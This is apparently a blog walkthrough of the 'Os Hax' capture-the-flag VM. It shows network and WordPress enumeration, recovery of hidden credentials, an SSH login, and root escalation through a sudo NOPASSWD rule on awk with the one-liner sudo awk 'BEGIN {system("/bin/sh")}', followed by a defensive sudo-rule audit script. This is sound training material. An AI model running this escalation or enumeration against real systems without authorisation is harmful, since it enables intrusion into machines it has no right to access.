Os Hax walkthrough
Host discovery

```
arp-scan -l
```
Network topology

| Machine | IP |
|---|---|
| Local host (Win10) | 192.168.36.234 |
| Kali | 192.168.36.89 |
| OS-Hax | 192.168.36.98 |
Port and service version scan

```
nmap -A 192.168.36.98
```
```
┌──(root💀kali)-[~]
└─# nmap -A 192.168.36.98
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 05:11 UTC
Nmap scan report for localhost (192.168.36.98)
Host is up (0.016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 43:0e:61:74:5a:cc:e1:6b:72:39:b2:93:4e:e3:d0:81 (RSA)
|   256 43:97:64:12:1d:eb:f1:e9:8c:d1:41:6d:ed:a4:5e:9c (ECDSA)
|_  256 e6:3a:13:8a:77:84:be:08:57:d2:36:8a:18:c9:09:d6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
MAC Address: A8:66:7F:1B:19:D8 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
The scan shows that the target has only ports 22 and 80 open, nothing remarkable. Directory enumeration comes next: the site under /wordpress/ turns out to be a WordPress CMS, and a wpscan run enumerates a single user: web
```
┌──(root💀kali)-[~]
└─# wpscan --url http://192.168.36.98/wordpress/ -e u
...
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:06 <====================================> (10 / 10) 100.00% Time: 00:00:06
[i] User(s) Identified:
[+] web
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
...
```
Brute-forcing the password of that account led nowhere. Eventually a suspicious image file turned up in the /img directory: flaghost.png. The image only shows the target's hosts file as configured by the user, nothing of importance, but running strings on it reveals the string passw@45. The obvious first guess was an account password, yet web:passw@45 logs in to neither the WordPress admin panel nor the SSH service; it turned out to be a directory name 🙄.
Under http://192.168.36.98/passw@45/ sits a text file flag2.txt; decoding its contents as Brainfuck yields a username and password: web:Hacker@4514
Getshell
Log in to the target's SSH service with web:Hacker@4514. Checking the sudo rules shows that this user may run /usr/bin/awk as root without a password.
```
┌──(root💀kali)-[~]
└─# ssh web@192.168.36.98
web@192.168.36.98's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
...
$ id
uid=1001(web) gid=1000(uname-a) groups=1000(uname-a)
$ uname -a
Linux jax 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:01:15 UTC 2019 i686 i686 i686 GNU/Linux
$ sudo -l
Matching Defaults entries for web on jax:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User web may run the following commands on jax:
    (root) NOPASSWD: /usr/bin/awk
...
```
The third flag is in web's home directory:
```
$ cat flag3.txt
 ______ ______ ____ __
/ ____/____ /_ __/____ / __ \ ____ ____ / /_
/ / __ / __ \ / / / __ \ / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ / / / / /_/ / / _, _// /_/ // /_/ // /_
\____/ \____/ /_/ \____/ /_/ |_| \____/ \____/ \__/
MD5-HASH : 40740735d446c27cd551f890030f7c75
```
Privilege escalation
We know the web account may run /usr/bin/awk as root via sudo. Following this article on awk privilege escalation, awk's system() call spawns a root shell and the last flag is obtained.
```
web@jax:~$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
flag3.txt
# cat flag3.txt
 ______ ______ ____ __
/ ____/____ /_ __/____ / __ \ ____ ____ / /_
/ / __ / __ \ / / / __ \ / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ / / / / /_/ / / _, _// /_/ // /_/ // /_
\____/ \____/ /_/ \____/ /_/ |_| \____/ \____/ \__/
MD5-HASH : 40740735d446c27cd551f890030f7c75
```
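As an added defender-side example (not part of the original post), the following Python audit parses `sudo -l` output like the one shown above and flags rules that let a user run a shell-capable binary as root, such as the awk rule on this box. The sample text is a constructed copy of the box's output, and the binary list is an illustrative assumption, not an exhaustive catalogue.

```python
import re

# Constructed sample: the `sudo -l` output seen on this box (not live data).
SAMPLE_SUDO_L = """Matching Defaults entries for web on jax:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User web may run the following commands on jax:
    (root) NOPASSWD: /usr/bin/awk
"""

# Binaries that hand the caller an arbitrary command as the run-as user
# (awk's system() is the one abused here). Assumed list, not exhaustive.
SHELL_CAPABLE = {"awk", "gawk", "mawk", "nawk", "sh", "bash", "python", "python3", "perl"}

# One sudoers-style rule line: "(runas) TAG: TAG: /path/one, /path/two"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return the command rules from `sudo -l` text as dicts: runas, tags, cmd."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # rules start after this header line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append({"runas": m.group("runas").strip(),
                              "tags": tags, "cmd": cmd.strip()})
    return rules


def risky_rules(rules):
    """Flag rules that let the user run a shell-capable binary (or ALL) as root."""
    findings = []
    for r in rules:
        runas_user = r["runas"].split(":")[0].strip()   # "(root : root)" -> root
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]  # /usr/bin/awk -> awk
        if runas_user in ("root", "ALL") and (binary in SHELL_CAPABLE or r["cmd"] == "ALL"):
            why = f"{r['cmd']} runs arbitrary commands as root"
            if "NOPASSWD" in r["tags"]:
                why += " without a password"
            findings.append((r["cmd"], why))
    return findings


if __name__ == "__main__":
    for cmd, why in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[!] {cmd}: {why}")
```

The only real fix for a rule like this is to remove it: sudoers cannot safely constrain awk's arguments, because the program text itself can always call system().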
Summary
The main lesson is privilege escalation through the awk tool when it runs with root privileges (SUID, or, as here, a sudo NOPASSWD rule); the command is: sudo awk 'BEGIN {system("/bin/sh")}'
This post is licensed under CC BY 4.0 by the author.